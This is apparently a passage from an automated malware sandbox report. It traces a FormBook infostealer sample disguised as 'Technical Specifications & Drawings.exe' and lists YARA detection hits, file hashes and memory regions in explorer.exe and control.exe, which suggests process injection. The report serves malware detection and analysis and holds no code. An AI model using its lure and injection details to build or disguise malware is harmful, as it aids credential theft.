                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low

                                                Target ID:4
                                                Start time:12:27:16
                                                Start date:08/08/2022
                                                Path:C:\Users\user\Desktop\Technical Specifications & Drawings.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\Desktop\Technical Specifications & Drawings.exe
                                                Imagebase:0xd20000
                                                File size:800256 bytes
                                                MD5 hash:9B94F751E8CC145058DB9F428C2AD571
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                Target ID:5
                                                Start time:12:27:19
                                                Start date:08/08/2022
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0x7ff6b8cf0000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                Target ID:19
                                                Start time:12:27:54
                                                Start date:08/08/2022
                                                Path:C:\Windows\SysWOW64\control.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\control.exe
                                                Imagebase:0x1c0000
                                                File size:114688 bytes
                                                MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate

                                                No disassembly